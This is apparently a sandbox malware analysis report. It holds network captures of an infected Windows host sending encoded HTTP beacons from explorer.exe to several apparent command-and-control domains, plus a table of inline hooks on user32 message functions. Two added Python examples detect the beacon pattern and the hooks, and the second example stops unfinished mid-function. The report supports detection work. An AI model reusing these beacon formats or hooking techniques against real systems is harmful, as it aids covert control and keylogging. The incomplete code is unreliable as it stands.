Jan 13, 2021 21:25:32.368196011 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:32.422194004 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:33.275630951 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:33.323690891 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:34.621407986 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:34.672171116 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:35.550206900 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:35.598148108 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:36.332773924 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:36.380810976 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:25:53.075989962 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:25:53.126849890 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:14.372950077 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:14.432109118 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:15.059200048 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:15.115607023 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:15.769350052 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:15.828141928 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:16.510773897 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:16.567265987 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:17.014070988 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:17.070439100 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:17.286334038 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:17.345649004 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:17.577235937 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:17.628079891 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:18.187264919 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:18.270222902 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:18.918555021 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:18.969310999 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:19.880409002 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:19.928311110 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:20.811372995 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:20.861788034 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:21.446341038 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:21.544389009 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:33.011740923 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:33.091243029 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:33.881355047 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:33.941781044 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:26:53.489366055 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:26:53.588946104 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:27:06.181643963 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:27:06.229589939 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:27:08.425323009 CET | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:27:08.494129896 CET | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:27:14.754261017 CET | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:27:14.836515903 CET | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:27:35.661072016 CET | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:27:36.019072056 CET | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:27:56.201952934 CET | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:27:56.261003017 CET | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:28:16.858023882 CET | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:28:16.932145119 CET | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Jan 13, 2021 21:28:39.854707003 CET | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Jan 13, 2021 21:28:40.007352114 CET | 53 | 57525 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:26:33.011740923 CET | 192.168.2.4 | 8.8.8.8 | 0xdb25 | Standard query (0) | www.millcityloam.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:53.489366055 CET | 192.168.2.4 | 8.8.8.8 | 0x5ae5 | Standard query (0) | www.jacmkt.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:14.754261017 CET | 192.168.2.4 | 8.8.8.8 | 0xbe02 | Standard query (0) | www.achonabu.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:35.661072016 CET | 192.168.2.4 | 8.8.8.8 | 0x117b | Standard query (0) | www.zhaowulu.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.201952934 CET | 192.168.2.4 | 8.8.8.8 | 0x5b2a | Standard query (0) | www.a-zsolutionsllc.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:16.858023882 CET | 192.168.2.4 | 8.8.8.8 | 0xa49c | Standard query (0) | www.nationshiphop.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:39.854707003 CET | 192.168.2.4 | 8.8.8.8 | 0x733 | Standard query (0) | www.hwcailing.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:26:33.091243029 CET | 8.8.8.8 | 192.168.2.4 | 0xdb25 | No error (0) | www.millcityloam.com | millcityloam.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:26:33.091243029 CET | 8.8.8.8 | 192.168.2.4 | 0xdb25 | No error (0) | millcityloam.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:53.588946104 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae5 | Name error (3) | www.jacmkt.com | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:14.836515903 CET | 8.8.8.8 | 192.168.2.4 | 0xbe02 | No error (0) | www.achonabu.com | | 172.96.186.206 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | www.a-zsolutionsllc.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:16.932145119 CET | 8.8.8.8 | 192.168.2.4 | 0xa49c | No error (0) | www.nationshiphop.com | nationshiphop.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:28:16.932145119 CET | 8.8.8.8 | 192.168.2.4 | 0xa49c | No error (0) | nationshiphop.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:40.007352114 CET | 8.8.8.8 | 192.168.2.4 | 0x733 | No error (0) | www.hwcailing.com | | 107.160.136.152 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.millcityloam.com
• www.achonabu.com
• www.a-zsolutionsllc.com
• www.nationshiphop.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49759 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:26:33.137989044 CET | 1103 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1
Host: www.millcityloam.com
Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Jan 13, 2021 21:26:33.276386023 CET | 1105 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 13 Jan 2021 20:26:33 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5ffc838f-113"
Via: 1.1 google
Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49767 | 172.96.186.206 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:27:14.964339018 CET | 4038 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1
Host: www.achonabu.com
Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Jan 13, 2021 21:27:17.656807899 CET | 4039 | IN | HTTP/1.1 404 Not Found
Connection: close
X-Powered-By: PHP/5.6.40
Content-Type: text/html; charset=UTF-8
X-UA-Compatible: IE=edge
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
X-LiteSpeed-Cache-Control: public,max-age=3600
X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
X-Litespeed-Cache: miss
Transfer-Encoding: chunked
Date: Wed, 13 Jan 2021 20:27:17 GMT
Server: LiteSpeed
                                              Data Raw: 34 35 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 26 23 38 32 31 31 3b 20 41 42 43 20 52 75 67 20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 74 61 6c 20 57 6f 72 64 50 72 65 73 73 20 54 68 65 6d 65 20 33 2e 36 2e 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52 75 67 
20 43 6c 65 61 6e 69 6e 67 20 4e 59 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 63 63 61 72 70 65 74 63 61 72 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 42 43 20 43 61 72 70 65 74 20 43 61 72 65 20 2d 20 41 42 43 20 52
                                              Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><head><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="http://abccarpetcare.com/xmlrpc.php"><title>Page not found &#8211; ABC Carpet Care &#8211; ABC Rug Cleaning NYC</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="generator" content="Total WordPress Theme 3.6.0" /><link rel='dns-prefetch' href='//abccarpetcare.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC Rug Cleaning NYC &raquo; Feed" href="https://abccarpetcare.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC R


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49768 | 198.54.117.217 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:27:56.454940081 CET | 4054 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1
Host: www.a-zsolutionsllc.com
Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49769 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:28:16.982839108 CET | 4055 | OUT | GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1
Host: www.nationshiphop.com
Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Jan 13, 2021 21:28:17.122550011 CET | 4055 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 13 Jan 2021 20:28:17 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5ffc838f-113"
Via: 1.1 google
Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
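The four HTTP sessions above have one shape. The sender is explorer.exe, not Inv.exe. Each request is `GET /hko6/?` with two query parameters, `Connection: close`, no User-Agent or Accept header, and seven null bytes after the header block (the `Data Raw: 00 00 00 00 00 00 00` line). The `OHiLR=jJBpdVbhUrMh9TJP` value is identical toward every host (the parameter order flips in session 3), while the hosts are unrelated: two domains fronted by Google returning 403, a WordPress site returning 404, and a Namecheap parking page. The only IDS hits are SID 1201, which fires on the server's 403 reply, so the beacon itself went unflagged. The Python below is an added example, not Joe Sandbox's code, of a client-side detector for this pattern: it parses raw request blocks, scores the per-request traits listed above, and alerts when one process sends the same path and the same fixed query token to several distinct hosts. The sample requests are the four from the report, re-typed as byte strings, plus one constructed benign request; the threshold of three hosts and the trait scoring are my choices.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Distinct hosts that must receive the same path + fixed token before we alert (my choice, not from the report).
MIN_HOSTS = 3


def split_query(qs: str):
    """Split a query string without percent- or plus-decoding so tokens compare byte-for-byte."""
    pairs = []
    for part in qs.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into method, path, query pairs, lower-cased headers and trailing body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path, "query": split_query(parts.query),
            "headers": headers, "body": body}


def beacon_features(req):
    """Traits shared by the four beacons in the capture; each alone is weak, three or more together are specific."""
    traits = []
    if req["method"] == "GET" and req["headers"].get("connection", "").lower() == "close":
        traits.append("get-connection-close")
    if req["body"] and req["body"].strip(b"\0") == b"":
        traits.append("null-padded-body")            # the "Data Raw: 00 00 00 00 00 00 00" after the headers
    if len(req["query"]) == 2 and all(len(v) >= 16 for _, v in req["query"]):
        traits.append("two-opaque-params")
    if "user-agent" not in req["headers"] and "accept" not in req["headers"]:
        traits.append("no-browser-headers")
    return traits


def find_rotating_beacons(observations, min_hosts=MIN_HOSTS):
    """observations: iterable of (process_name, raw_request_bytes).
    Groups beacon-shaped requests by (process, path, shortest query value) and returns the groups that
    reached min_hosts distinct Host headers: one client token sprayed across unrelated domains."""
    groups = defaultdict(lambda: {"hosts": set(), "traits": set()})
    for process, raw in observations:
        req = parse_request(raw)
        traits = beacon_features(req)
        if len(traits) < 3:
            continue
        values = [v for _, v in req["query"]]
        token = min(values, key=len) if values else ""   # the value that stays fixed across hosts
        group = groups[(process, req["path"], token)]
        group["hosts"].add(req["headers"].get("host", ""))
        group["traits"].update(traits)
    return {key: {"hosts": sorted(g["hosts"]), "traits": sorted(g["traits"])}
            for key, g in groups.items() if len(g["hosts"]) >= min_hosts}


def _req(host: str, query: str) -> bytes:
    """Rebuild one of the captured requests: header block followed by the seven null bytes the report shows."""
    return f"GET /hko6/?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode() + b"\0" * 7


# The four beacons from the capture (re-typed) plus one constructed browser request that must not group.
SAMPLE = [
    ("explorer.exe", _req("www.millcityloam.com", "OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4")),
    ("explorer.exe", _req("www.achonabu.com", "OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer")),
    ("explorer.exe", _req("www.a-zsolutionsllc.com", "OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p")),
    ("explorer.exe", _req("www.nationshiphop.com", "k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP")),
    ("chrome.exe", b"GET /search?q=formbook HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n"
                   b"Accept: */*\r\nConnection: close\r\n\r\n"),
]

if __name__ == "__main__":
    for (process, path, token), hit in find_rotating_beacons(SAMPLE).items():
        print(f"{process} {path} token={token} hosts={hit['hosts']} traits={hit['traits']}")
```

The grouping key deliberately ignores the Host header and the long parameter, which change on every beacon, and keys on what stays fixed: the process, the path and the short token. On a live host the process-to-request attribution the sandbox provides comes from whatever maps sockets to processes (Sysmon event ID 3 or an EDR's network telemetry joined to a proxy log); without that join the same logic still works on the path and token alone, with a higher host threshold to compensate.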


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3
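The hook table records that the first bytes of four user32 exports in explorer.exe no longer match the module on disk; "New Data" is what now sits at each entry point. Hooking the message-retrieval functions is how a keylogger sees every window message in the process it injected. The check behind such a table is a byte comparison: read each export's prolog from the live process and from the file mapped with its section layout (both relocated to the same base), and report any export whose bytes differ. The Python below is an added example, not Joe Sandbox's code, of that comparison. It also decodes the common trampoline shapes (relative jmp or call, RIP-relative indirect jmp, push/ret, mov rax/jmp rax) so the hook target can be followed; bytes that fit none of these, such as the six bytes in the table above, are reported as an unrecognised patch rather than guessed. The export names, RVAs, clean prolog and image base are constructed for the test; reading the live bytes (ReadProcessMemory at module base plus RVA) is not shown.

```python
import struct

IMAGE_BASE = 0x7FF800000000   # assumed load address of the module under test (constructed, not from the report)


def decode_patch(patch: bytes, va: int):
    """Classify bytes found at function address va as a known trampoline shape.
    Returns (kind, target); target is None when the shape is not recognised."""
    mask = 0xFFFFFFFFFFFFFFFF
    if len(patch) >= 5 and patch[0] in (0xE9, 0xE8):                      # jmp rel32 / call rel32
        rel = struct.unpack_from("<i", patch, 1)[0]
        return ("jmp rel32" if patch[0] == 0xE9 else "call rel32", (va + 5 + rel) & mask)
    if len(patch) >= 6 and patch[:2] == b"\xFF\x25":                      # jmp qword ptr [rip+disp32]
        disp = struct.unpack_from("<i", patch, 2)[0]
        return ("jmp [rip+disp32]", (va + 6 + disp) & mask)               # address of the pointer slot
    if len(patch) >= 6 and patch[0] == 0x68 and patch[5] == 0xC3:          # push imm32 ; ret
        return ("push/ret", struct.unpack_from("<I", patch, 1)[0])
    if len(patch) >= 12 and patch[:2] == b"\x48\xB8" and patch[10:12] == b"\xFF\xE0":  # mov rax, imm64 ; jmp rax
        return ("mov rax/jmp rax", struct.unpack_from("<Q", patch, 2)[0])
    return ("unrecognised patch", None)


def find_inline_hooks(exports, disk_image: bytes, live_image: bytes, image_base: int, prolog_len: int = 16):
    """exports: {name: rva}. disk_image and live_image are the module in section layout (not file layout),
    the first from the file, the second from the process, both relocated to image_base.
    Returns (name, kind, target, first six live bytes as hex) for each export whose prolog differs."""
    hooks = []
    for name, rva in sorted(exports.items(), key=lambda kv: kv[1]):
        expected = disk_image[rva:rva + prolog_len]
        observed = live_image[rva:rva + prolog_len]
        if expected == observed:
            continue
        kind, target = decode_patch(observed, image_base + rva)
        hooks.append((name, kind, target, observed[:6].hex(" ")))
    return hooks


# Constructed fixture: four exports at made-up RVAs sharing a placeholder prolog (not real user32 code).
EXPORTS = {"PeekMessageA": 0x1000, "PeekMessageW": 0x1010, "GetMessageA": 0x1020, "GetMessageW": 0x1030}
CLEAN_PROLOG = b"\x48\x89\x5C\x24\x08\x48\x89\x74\x24\x10\x57\x48\x83\xEC\x20\x90"
DISK_IMAGE = b"\0" * 0x1000 + CLEAN_PROLOG * 4


def patched_live_image() -> bytes:
    """The same image after two patches: a rel32 jmp on PeekMessageA (constructed) and, on GetMessageA,
    the six bytes the report lists as New Data, which match none of the shapes decode_patch knows."""
    live = bytearray(DISK_IMAGE)
    live[0x1000:0x1005] = b"\xE9" + struct.pack("<i", 0x20000 - 5)
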